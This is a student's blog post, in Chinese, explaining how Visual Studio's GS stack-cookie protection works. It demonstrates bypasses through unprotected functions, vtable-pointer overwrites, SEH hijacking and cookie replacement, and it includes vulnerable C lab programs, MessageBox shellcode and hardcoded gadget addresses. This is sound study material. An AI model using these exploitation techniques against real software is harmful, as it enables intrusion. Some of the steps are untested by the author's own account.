20155306 白皎 0day漏洞——漏洞利用原理之GS

20155306 白皎 0day漏洞——漏洞利用原理之GS

一、GS安全编译选项的保护原理

1.1 GS的提出

在第二篇博客（栈溢出利用）中，我们可以通过覆盖函数的返回地址来进行攻击，面对这个重灾区，Windows在VS 7.0(Visual Studio 2003)及以后版本的Visual Studio中默认启动了一个安全编译选项——GS（针对缓冲区溢出时覆盖函数返回地址这一特征），来增加栈溢出的难度。

1.2 GS的工作原理

GS编译选项为每个函数调用增加了一些额外的数据和操作,用以检测栈中的溢出。

• 在所有函数调用发生时，向栈帧内压入一个额外的随机DWORD，随机数被称为Security Cookie。
• Security Cookie位于EBP之前，系统将在.data的内存区域中存放一个Security Cookie的副本，如下图所示：

• 当栈中发生溢出时，Security Cookie会首先被淹没，之后才是EBP和返回地址。

• 在函数返回之前，系统将执行一个额外的安全验证操作，被称作Security check。

• 在Security check过程中，系统将比较栈帧中原先存放的SC和存放在.data之中的SC值进行比较，如果两者不吻合，说明栈帧中的SC已经被破坏，即栈中发生溢出。

• 当检测到栈中发生溢出时，系统将进入异常处理流程，函数不会被正常返回，ret指令也不会被执行。如图：

但是，GS保护机制的使用带来的后果就是系统性能的下降，所以编译器并不是对所有的函数都应用GS，以下情况不会应用GS：

1. 函数不包含缓冲区
2. 函数被定义为具有变量参数列表
3. 函数使用无保护的关键字标记
4. 函数在第一个语句中包含内嵌汇编代码
5. 缓冲区不是8字节类型且大小不大于4字节

1.3 Security Cookie的生成

• 系统以.data节第一个双字作为Cookie的种子，或者原始Cookie（所欲函数的Cookie都用这个DWORD生成）

• 在程序每次运行时Cookie的种子都不用，因此种子具有很强的随机性；

• 在栈帧初始化以后系统用EBP异或种子，作为当前函数的Cookie，以此作为不同函数之间的区别，并增加Cookie的随机性；

• 在函数返回时前，用EBP还原出（异或）Cookie的种子。

当然，GS编译选项不可能一劳永逸彻底遏制所有类型的缓冲区溢出攻击，本节我们学习四种突破方法：

1.利用未被保护的内存突破GS 
2. 覆盖虚函数突破GS 
3.攻击异常处理突破GS 
4.同时替换栈中和.data中的Cookie突破GS 

二、利用未被保护的内存突破GS

原理：在前面我们我们介绍GS原理时提到，为了将GS对性能的影响降到最低，并不是所有函数都会被保护，所以我们可以利用一些未被保护的函数绕过GS的保护。
实验代码如下：

// gs1.cpp : 定义控制台应用程序的入口点。
//

#include"stdafx.h"
#include"string.h"
int vulfuction(char * str)
{
	char arry[4];
	strcpy(arry,str);
	return 1;
}
int _tmain(int argc,_TCHAR* argv[])
{
	char* str="yeah,the fuction is without GS";
	vulfuction(str);
	return 0;
}

我们在vs2008下对其进行编译后，用IDA对可执行程序反汇编时，可以看到没有任何Security Cookie的验证操作。

直接运行程序，程序会弹出异常对话框，可以看到提示说明了进行strcpy时发生了溢出，是不安全的。

三、覆盖虚函数突破GS

3.1 原理

GS机制中说明，程序只有在函数返回时，才会去检查Security Cookie，而在这之前是没有任何的检查措施。换句话说，只要我们在检查SC之前劫持程序流程，就可以实现对程序的溢出，而C++虚函数就可以起到这样的功能。

3.2实验思路及步骤

• 实验代码如下：

    #include "stdafx.h"
    #include "string.h"
    class GSVirtual {
    public :
    void gsv(char * src)
    {
    	char buf[200];
    	printf("begin!");
    	strcpy(buf, src);
    	printf("done!");
    	bar(); // virtual function call
    }
    virtual void  bar()
    {
    }
    };
    int main()
    {
  
    GSVirtual test;
    test.gsv(
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90"
    );
    return 0;
    }
  

• 实验思路

• gsv中存在着典型的缓冲区溢出的漏洞函数strcpy。

• gsv中存在一个虚函数bar()。

• 当gsv函数中的buf变量发生溢出的时候就可能覆盖到虚表指针，倘若如果能够控制虚表指针使其指向我们可以控制的内存空间，那么就就可以运行缓冲区中相应的shellcode了。

• 实验步骤：

1.如代码所示，在test.gsv传入199个"x90"+1个""，通过前面的分析，我们知道传入参数的长度大于200时，变量buff就会溢出。为了能够精准的覆盖虚函数，我们需要搞清楚内存布局。gsv相当于一个shellcode，变量buff容量是200个字节。当gsv超过200字节时，便会发生溢出覆盖。这个函数的内存布局依次是：cookie，EBP，返回地址，参数，虚函数表地址，总共5项。所以要想覆盖虚函数表地址来达到目的，必须gsv要再多（5*4字节=20字节），最后的字节才能准确覆盖到虚函数表地址。这同时也验证了为什么我们后来构造shellcode的时候要把跳板指令放在shellcode的最后四个字节。

2.编译生成exe文件，用ollydbg打开生成的文件，在strcpy函数处设置一个断点。

3.按 调试——运行，运行到断点处，可以明确得到buf区的起始地址：

4.继续单步执行，到调用虚函数停止，即call dword ptr eax这句，发现虚表地址为0x004010C0如下图：

5.由此我们可以知道，当strcpy函数执行完之后，就是运行虚函数。根据我们一开始的思路，我们需要做的是把虚表指针指向我们的shellcode来劫持进程，那么程序就会执行我们预设的shellcode了。

• 首先我们可以肯定的是我们没有办法使用最简单的办法jmp esp来直接跳转到buf区的起始地址0x0012FEA8,因为在执行完strcpy函数后的栈并不包含该数值
• 既然当时的栈之中没有该数值，那么我们就要找其它栈存放该地址。在右下角的表中，我们可以发现在0x0012FE9C处存放着0x0012FEA8，如下图。那么我们只需要将当前esp指针移至0x0012FE9C即可。

在寄存器状态列表中获取当前的esp的值，为0x0012FEA4。要令其移至0x0012FE9C，那么就需要esp+8，所以只要在当前状态下执行三次pop语句后，执行retn语句将程序强制返回栈顶(0x0012FE9C)所含值（0x0012FEA8)地址处，那么接下来就可以执行预设的shellcode了。

通过查询反汇编代码，发现在内存地址为0x7C992B04处就有符合要求的语句，如下图。

• 接下里只需要将该地址作为参数放在shellcode之前，加入到test.gsv参数中，令程序认为该地址为机器语言（相当于跳板的功能），执行三次pop和retn的命令，就能够达到绕过GS保护机制，执行shellcode了，shellcode代码如下：

    			"x66x2bx99x7C"  
    			"xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"
    			"x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"
    			"x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"
    			"x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"
    			"xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"
    			"x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"
    			"xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"
    			"xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"
    			"x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"
    			"x53x68x77x65x73x74x68x66x61x69x6Cx8BxC4x53x50x50"
    			"x53xFFx57xFCx53xFFx57xF8x90x90x90x90x90x90x90x90"
    			"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    			"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    			"x90x90x90x90x90x90x90x90"
  

有三部分组成：跳板地址（pop+retn共4字节）+谈对话框的机器码（168字节）+0x90字节填充（49字节）=221字节，刚好超过之前分析出来的至少220字节。
替换shellcode，重新运行就可以啦！

四、攻击异常处理突破GS

4.1实验原理

因为GS机制没有对S.E.H提供保护**，所以我们可以通过超长的字符串覆盖掉异常处理函数指针，然后出触发一个异常，程序就会转入异常处理，由于异常处理函数指针已经被覆盖，那么我们就可以通过劫持S.E.H来控制程序的后续流程了。

4.2实验思路及步骤

• 实验代码如下：

    #include <stdafx.h>
    #include <string.h>
    char shellcode[]=
    "xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"
    "x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"
    "x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"
    "x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"
    "xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"
    "x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"
    "xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"
    "xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"
    "x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"
    "x53x68x77x65x73x74x68x66x61x69x6Cx8BxC4x53x50x50"
    "x53xFFx57xFCx53xFFx57xF8x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90"
    "xA0xFEx12x00"//address of shellcode
    ;
  
  
    void test(char * input)
    {
    	
    	char buf[200];
    	strcpy(buf,input);
        strcat(buf,input);
    }
    
    void main()
    {
    	test(shellcode);	
    }
  

• 实验思路：

• 函数test中存在典型的栈溢出漏洞
• 在strcoy操作后变量buf会溢出，S.E.H异常处理句柄会被过长的字符串所覆盖
• 由于strcpy的溢出，覆盖了input的地址，导致了strcat从一个非法地址读取数据，这时就会触发异常，程序进入异常处理，这样就可以在程序检查SC之前将程序流程劫持。

实验环境为系统windows 2000，由于无法安装增强工具以及软件所以只说明原理。

五、同时替换栈中和.data中的Cookie突破GS

5.1实验原理

根据GS保护机制的原理，最终在Security check过程中比对的是栈中Cookie值和.data中的Cookie值，那么想要绕过Security check有两种方法：

• 猜测Cookie值。
• 同时替换栈中和.data中的Cookie，保证溢出后的Cookie值的一致性。
• 由于cookie的生成随机性太高，可能性极低，因此我们选择同时替换栈中和.data中的Cookie。

5.2实验思路及步骤

• 实验代码：

    #include <stdafx.h>
    #include <string.h>
    #include <stdlib.h>
    char shellcode[]=
    "x90x90x90x90"//new value of cookie in .data
    "xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"
    "x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"
    "x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"
    "x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"
    "xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"
    "x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"
    "xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"
    "xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"
    "x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"
    "x53x68x35x32x31x32x68x32x30x31x33x8BxC4x53x50x50"
    "x53xFFx57xFCx53xFFx57xF8"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "xF4x6Fx82x90"//result of x90x90x90x90 xor EBP
    "x90x90x90x90"
    "x94xFEx12x00"//address of shellcode
    ;
    void test(char * str, int i, char * src)
    {
    	char dest[200];
    	if(i<0x9995)
    	{
    		char * buf=str+i;
    		*buf=*src;
    		*(buf+1)=*(src+1);
    		*(buf+2)=*(src+2);
    		*(buf+3)=*(src+3);
    	    strcpy(dest,src);
    	}
    }
    void main()
    {
    	char * str=(char *)malloc(0x10000);
    	test(str,0xFFFF2FB8,shellcode);	
    }
  

• 实验思路：

• main函数中在堆中申请了0x1000个字节的空间，并通过test函数对其空间的内容进行操作。
• test函数对s+i到s+i+3的内存进行赋值，虽然函数对i进行了上限判断，但是没有判断i是否大于0，当i为负值时，s+i所指向的空间就会脱离main中申请的空间，进而有可能会指向.data区域，从而修改.data中的SC值。
• test函数中的strcpy存在典型的溢出漏洞。

• 实验步骤：（虽然看懂了原理和实验步骤，但是由于我的xp装不上VS2008，没有GS机制，在编译代码时不会生成security cookie。在考完最近一门课之后，打算再做尝试。）

1.将代码中shellcode替换成8个/x90，避免出现缓冲区溢出，从而进行正常的SC检查，生成可运行程序，并用Ollydbg打开。
2.在if语句处设置断点，从而观察SC生成流程，F9运行至断点处，获取sc和EBP的值。

补充：SC的检验流程

	a. 从EBP-4中提取SC

	b. 从.data区存放副本SC处提取副本SC
	
	c. 比较两者，若一致则校验通过，否则转入校验失败的异常处理

3.明确malloc申请空间的起始地址，可以通过在malloc后设置断点来查看。

4.由于test函数中存放一个参数i，让这个参数传递一个负值来让指针str向存放sc的方向移动，即指向起始地址的指针指向栈中存放SC的地址。

5.计算出上述两地址间的偏移量，将其写入test函数的i参数中。

6.之后运行test函数，shellcode的内容将覆盖掉0x00403000处的内容，即达到修改栈中SC的目的。

7.通过编写shellcode代码修改栈中的SC

第一部分：在shellcode代码前增加4个"x90"来修改栈中的SC的值。
第二部分：shellcode代码来弹出的对话框
第三部分：用"x90"填充32个字节至SC所在位置
第四部分：用4个x90和EBP异或结果覆盖SC的值。

8.将布置好的shellcode代码复制到程序里，编译运行即可出现对话框。

六、补充：关于虚函数的介绍

定义：C++类的成员函数在声明时,若使用关键字virtual进行修饰,则被称为虚函数.
一些要点：

• 一个类中可能有很多个虚函数。

• 虚函数的入口地址被统一保存在虚表中。

• 对象在使用虚函数时,先通过虚表指针找到虚表,然后从虚表中取出最终的函数入口地址进行调用。

• 虚表指针保存在对象的内存空间中,紧接着虚表指针的是其他成员变量。

• 虚函数只有通过对象指针的引用才能显示出其动态调用的特性

• 根据虚函数的特性,可以通过修改对象中的虚表指针,令其指向存放预设shellcode的地址,从而调用虚函数的时候执行shellcode,达到溢出攻击的目的,如下图所示：
  

写到这里，觉得自己还蛮不容易。这篇博客的内容，我学习实践了很久，但就是做不出来我有什么办法呢。只好去求助宇栋老师哈哈，终于解决了我一个大问题，然后虚函数才得以实践下来。不禁要感叹一下自己知识学的太浅薄，错误的环节总是出现在自己完全没有想到的地方，比如断点设在代码里，用OD调试是没有用的，哎。还是好好学习吧。今天写的内容是关于GS，我们现在一般用的Visual Studio中都会默认启动了一个安全编译选项——GS，就是针对前面第二篇博客中的攻击，通过SC来检测和增加栈溢出的难度，但我们也同有对策，可以构造合适长度的字符串来覆盖虚表指针来跳转到虚函数指针，调用我们构造的shellcode；覆盖覆盖掉异常处理函数指针，以及覆盖栈中的SC来实现我们的目的。

参考文献：
[1]王清.《0day安全：软件漏洞分析技术》[M].中国：电子工业出版社,2008.
[2]王清.《0day安全：软件漏洞分析技术（第2版）》[M].中国：电子工业出版社,2011.